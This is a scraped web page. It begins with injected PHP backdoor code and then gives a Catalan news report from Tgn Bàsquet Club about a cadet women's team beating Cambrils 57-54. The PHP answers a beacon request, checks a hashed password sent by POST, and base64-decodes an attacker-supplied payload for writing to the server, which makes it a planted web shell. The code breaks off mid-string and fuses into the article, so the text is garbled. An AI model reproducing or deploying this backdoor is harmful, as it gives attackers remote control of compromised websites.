function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 1 s'aferra a la fam de victòries per vèncer el Cambrils (57-54) - Tgn Bàsquet Club -

El cadet femení 1 s’aferra a la fam de victòries per vèncer el Cambrils (57-54)

Updated: març 1, 2016

El cadet femení 1 va guanyar el Cambrils en un partit que va tenir moltes alternatives i un final ajustat. Després d’un mal inici (1-9), les locals, gràcies a les ràpides transicions ofensives, van capgirar el resultat (26-13 al minut 15). Amb tot, el Cambrils va reaccionar, va saber aturar els contraatacs liles i va dur el ritme del matx, dominant en el rebot (31-26 al descans).

El tercer quart les visitants tenien la batuta del matx (39-42) i només una sèrie de bones defenses locals va permetre les noies que entrena Laureà Català entrar en els cinc últims minuts per davant (45-42). Els últims deu minuts van ser molt emocionants. Els dos equips van cometre moltes errades però el TGN Bàsquet va saber defensar el seu avantatge per aconseguir el triomf.